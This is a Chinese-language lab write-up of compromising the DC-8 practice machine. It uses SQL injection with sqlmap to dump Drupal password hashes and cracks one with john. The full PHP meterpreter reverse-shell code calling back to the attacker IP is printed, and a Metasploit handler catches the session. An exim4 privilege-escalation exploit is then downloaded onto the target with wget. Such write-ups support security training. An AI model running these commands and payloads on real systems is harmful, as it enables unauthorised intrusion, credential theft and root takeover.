入侵靶机DC-8

DC-8

1.主机发现

使用Nmap进行ping扫描，根据已知mac地址获取ip地址。

Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.43.1
Host is up (0.0049s latency).
MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communications)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.0010s latency).
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Nmap scan report for ToolsScannerKali20201 (192.168.43.193)
Host is up (0.0050s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for LAPTOP-Q7VIH3TM (192.168.43.2)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.89 seconds

2.信息收集

端口扫描

Nmap 进行端口扫描

C:\Users\ASUS>Nmap 192.168.43.18 -A -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:36 ?D1ú±ê×?ê±??
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.13% done; ETC: 16:37 (0:00:01 remaining)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.000094s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms dc-8 (192.168.43.18)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.28 seconds

访问web页面

指纹查询

whatweb http://192.168.43.18

目录扫描

dirb http://192.168.43.18

访问防爬文件

http://192.168.43.18/robots.txt

发现后台登录界面

发现存在报错注入点

3.漏洞利用

sqlmap注入

列库名

sqlmap -u http://192.168.43.18/?nid=0%27 --dbs

列表名

sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db --tables

列字段名

sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users --columns

列字段内容

sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users -C "uid,name,pass" --dump 

john爆破密码

 

张密 john:turtle

登陆web后台

找写利用点

content 》》contcat us    WEBFROMS 》》 Components    WEBFORM 》》 Form settings

MSF生成phpshell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.php

kali@ToolsScannerKali20201:~$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1115 bytes

kali@ToolsScannerKali20201:~$ cat shell.php 
/*<?php /**/ error_reporting(0); $ip = '192.168.43.193'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();kali@ToolsScakali@ToolsScannerKali20201:~$ 

粘贴phpshell并执行

MSF开启监听

kali@ToolsScannerKali20201:~$ msfconsole 
[!] The following modules could not be loaded!..-
[!]     /usr/share/metasploit-framework/modules/exploits/windows/iis/cve-2017-7269.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.
                                                  

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to check out the result of hosts and services

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.43.193
LHOST => 192.168.43.193
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.43.193:4444 
[*] Sending stage (38288 bytes) to 192.168.43.18
[*] Meterpreter session 1 opened (192.168.43.193:4444 -> 192.168.43.18:44810) at 2020-10-15 07:36:25 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter > 

返回Contact Us界面提交任意内容

4.提权

交互式shell

shell
python -c "import pty;pty.spawn('/bin/bash')"

find查询带有suid权限的命令

www-data@dc-8:/$ find / -perm /4000 2>dev/null
find / -perm /4000 2>dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

查询exim4版本

使用exim4提权需要拥有写权限，tmp目录下写文件。

searchsploit搜索exim4已知漏洞

searchsploit exim

选择本地提权漏洞exp

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp
python -m SimpleHTTPServer

靶机wget下载本地提权exp

cd /tmp
wget http://192.168.43.193:8000/46996.sh
ls -l
chmod +x 46996.sh

出错了

这个错误dc-5出现过。DC-5

set ff=unix  使windows的代码可以在unix上运行

更改后从新下载一次

没有提权成功

查看脚本

脚本中有两种执行方法尝试第二种

./46996.sh -m netcat

5.提权成功查看flag